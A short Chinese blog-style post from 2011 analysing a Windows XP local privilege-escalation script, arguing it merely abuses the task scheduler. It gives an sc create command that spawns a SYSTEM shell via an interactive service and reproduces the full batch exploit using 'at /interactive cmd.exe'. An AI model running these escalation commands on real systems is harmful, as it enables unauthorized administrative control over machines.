关于最近出的xp本地system提权脚本研究

2011-6-22 王健宇

在看到这个脚本以后便明白了，其实这也算不上什么0day，只是利用任务计划而已。

同样我们还可以利用其他方式来提升到system权限，如：系统启动服务项也是system权限，按某些快捷键启动的也是system权限。

如代码：

sc Create xiaoyu binPath= "cmd /c start cmd" type= own type= interact start= auto

net start xiaoyu

成功执行出CMD以后同样是system权限，执行完毕以后可以用sc delete xiaoyu删除系统服务，当然这个我们也可以指定执行什么文件，但是拿来提权就不怎么好了，试想SC.EXE或者AT.EXE的权限都没有还怎么利用这些0day了？所以说这些都算不上什么0day，充其量只是利用系统正常功能而已。

最近公布的代码为：

@echo off
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
start time /T > time.txt
tskill explorer
time 13:36:59 > nul
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y